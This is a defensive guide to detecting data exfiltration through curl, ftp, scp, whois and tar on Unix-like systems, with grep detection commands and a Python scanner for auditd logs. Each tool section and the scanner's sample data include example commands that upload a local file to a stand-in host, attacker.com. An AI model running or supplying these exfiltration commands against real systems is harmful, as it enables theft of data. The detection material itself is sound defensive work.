File Upload

File Upload Detection and Monitoring on *nix Systems

Attackers often leverage file upload tools to exfiltrate sensitive data or transfer malicious files to external command centers. Below are common tools and methods for file uploads on Unix-like systems, along with strategies for detection and monitoring.


Key Commands for File Upload

1. curl Command

Purpose: Transfers data over various protocols (HTTP, HTTPS, FTP).

Example:

URL=http://attacker.com/  
LFILE=file_to_send  
curl -X POST -d @$LFILE $URL

Detection:

  • Focus on -X POST or -d parameters.

  • Verify destination IP/domain.

Detection Methods:

  • Audit Logs:

    grep "curl" /var/log/audit/audit.log | grep -E -- "-X|-d"
  • Command History:

    history | grep "curl" | grep -E -- "-X|-d"
    grep "curl" ~/.bash_history | grep -E -- "-X|-d"
  • EDR/XDR Logs: Inspect curl processes for POST or -X usage.

2. ftp Command

Purpose: Transfers files using the FTP protocol.

Example:

RHOST=attacker.com  
ftp $RHOST  
put file_to_send

Detection:

  • Monitor direct ftp usage, especially targeting external hosts.

Detection Methods:

  • Audit Logs:

    grep "ftp" /var/log/audit/audit.log
  • Command History:

    history | grep "ftp"
    grep "ftp" ~/.bash_history
  • EDR/XDR Logs: Investigate ftp connections and transfers.

3. scp Command

Purpose: Secure file transfer over SSH.

Example:

RPATH=user@attacker.com:~/file_to_save  
LPATH=file_to_send  
scp $LPATH $RPATH

Detection:

  • Identify anomalous scp usage, especially targeting unfamiliar destinations.

Detection Methods:

  • Audit Logs:

    grep "scp" /var/log/audit/audit.log
  • Command History:

    history | grep "scp"
    grep "scp" ~/.bash_history
  • EDR/XDR Logs: Analyze scp processes and associated network events.

4. whois Command

Purpose: Originally used for domain information lookup, it can be abused for data exfiltration.

Example:

RHOST=attacker.com  
RPORT=12345  
LFILE=file_to_send  
whois -h $RHOST -p $RPORT "`cat $LFILE`"

Detection:

  • Monitor -h or --host parameter usage for anomalies (whois sent to a host that is not a registry).

Detection Methods:

  • Audit Logs:

    grep "whois" /var/log/audit/audit.log | grep -- "-h"
  • Command History:

    history | grep "whois" | grep -- "-h"
    grep "whois" ~/.bash_history | grep -- "-h"
  • EDR/XDR Logs: Track whois processes for unusual host connections.

5. tar Command

Purpose: Archives files; with --rsh-command it can write the archive directly to a remote host over SSH.

Example:

RHOST=attacker.com  
RUSER=root  
RFILE=/tmp/file_to_send.tar  
LFILE=file_to_send  
tar cvf $RUSER@$RHOST:$RFILE $LFILE --rsh-command=/bin/ssh

Detection:

  • Monitor --rsh-command usage and associated remote connections.

Detection Methods:

  • Audit Logs:

    grep "tar" /var/log/audit/audit.log | grep -- "--rsh-command"
  • Command History:

    history | grep "tar" | grep -- "--rsh-command"
    grep "tar" ~/.bash_history | grep -- "--rsh-command"
  • EDR/XDR Logs: Analyze tar processes for unusual parameters.


General Detection Strategies

1. Monitor Network Activity

  • Track outgoing connections, especially to unknown or untrusted IPs/domains.

2. Audit Logs

  • Regularly review /var/log/audit/audit.log for suspicious file transfer commands.

3. Command History

  • Inspect user command history for potential misuse:

    history | grep "<command>"
    grep "<command>" ~/.bash_history

4. EDR/XDR Solutions

  • Use telemetry to:

    • Correlate process creation events with network activity.

    • Identify anomalous file transfer patterns.
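As an added example (not part of these notes), a small Python scanner that applies the per-tool indicators above to auditd EXECVE records rather than grepping raw text. It parses the a<N>= arguments, including the hex-encoded form auditd uses for arguments containing spaces (the grep pipelines above would miss the whois payload in that form), and runs against constructed sample records that are not real log data.

```python
import re
from typing import List, Optional

# Constructed auditd EXECVE records (sample data, not from a real host). auditd
# hex-encodes arguments containing spaces/quotes, as in the whois line (file contents).
SAMPLE_AUDIT_LOG = """\
type=EXECVE msg=audit(1700000000.101:201): argc=6 a0="curl" a1="-X" a2="POST" a3="-d" a4="@file_to_send" a5="http://attacker.com/"
type=EXECVE msg=audit(1700000000.102:202): argc=2 a0="curl" a1="https://intranet.example/health"
type=EXECVE msg=audit(1700000000.103:203): argc=6 a0="whois" a1="-h" a2="attacker.com" a3="-p" a4="12345" a5=7365637265742064617461
type=EXECVE msg=audit(1700000000.104:204): argc=5 a0="tar" a1="cvf" a2="root@attacker.com:/tmp/file_to_send.tar" a3="file_to_send" a4="--rsh-command=/bin/ssh"
type=EXECVE msg=audit(1700000000.105:205): argc=3 a0="tar" a1="cvf" a2="backup.tar"
type=EXECVE msg=audit(1700000000.106:206): argc=3 a0="scp" a1="file_to_send" a2="user@attacker.com:~/file_to_save"
type=SYSCALL msg=audit(1700000000.101:201): arch=c000003e syscall=59 success=yes exit=0
"""

ARG_RE = re.compile(r'\ba(\d+)=(?:"([^"]*)"|([0-9A-Fa-f]+))')  # a<N>="..." or a<N>=<hex>

def parse_execve_args(line: str) -> List[str]:
    """Return argv from an EXECVE record, decoding hex-encoded arguments."""
    argv = {}
    for idx, quoted, hexed in ARG_RE.findall(line):
        argv[int(idx)] = bytes.fromhex(hexed).decode("utf-8", "replace") if hexed else quoted
    return [argv[i] for i in sorted(argv)]

def classify(argv: List[str]) -> Optional[str]:
    """Apply the per-tool indicators from the notes; return a reason or None."""
    tool, args = argv[0].rsplit("/", 1)[-1], argv[1:]
    if tool == "curl" and any(a == "-X" or a.startswith("-d") for a in args):
        return "curl with -X/-d (possible POST upload)"
    if tool == "ftp":
        return "ftp client started"
    if tool == "scp" and any(":" in a and not a.startswith("-") for a in args):
        return "scp to a remote path"
    if tool == "whois" and any(a in ("-h", "--host") or a.startswith("--host=") for a in args):
        return "whois with explicit host (possible exfil channel)"
    if tool == "tar" and any(a.startswith("--rsh-command") for a in args):
        return "tar with --rsh-command (remote write over ssh)"
    return None

def scan(log_text: str) -> List[dict]:
    """Scan raw audit.log text; return one finding per matching EXECVE record."""
    hits = []
    for line in log_text.splitlines():
        argv = parse_execve_args(line) if "type=EXECVE" in line else []
        reason = classify(argv) if argv else None
        if reason:
            event = re.search(r"audit\(([^)]*)\)", line)
            hits.append({"event": event.group(1) if event else "?", "argv": argv, "reason": reason})
    return hits
```

Join each finding to its SYSCALL record (same audit(...) id) to get uid, ppid and exe, and then correlate with outbound network events as described above.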


Key Takeaways

  • Tools like curl, ftp, scp, whois, and tar are legitimate but can be misused for data exfiltration.

  • Detection involves monitoring specific parameters, verifying destination endpoints, and correlating logs from various sources.

  • A combination of audit logs, command history, and EDR/XDR telemetry provides a robust framework for detecting unauthorized file uploads.
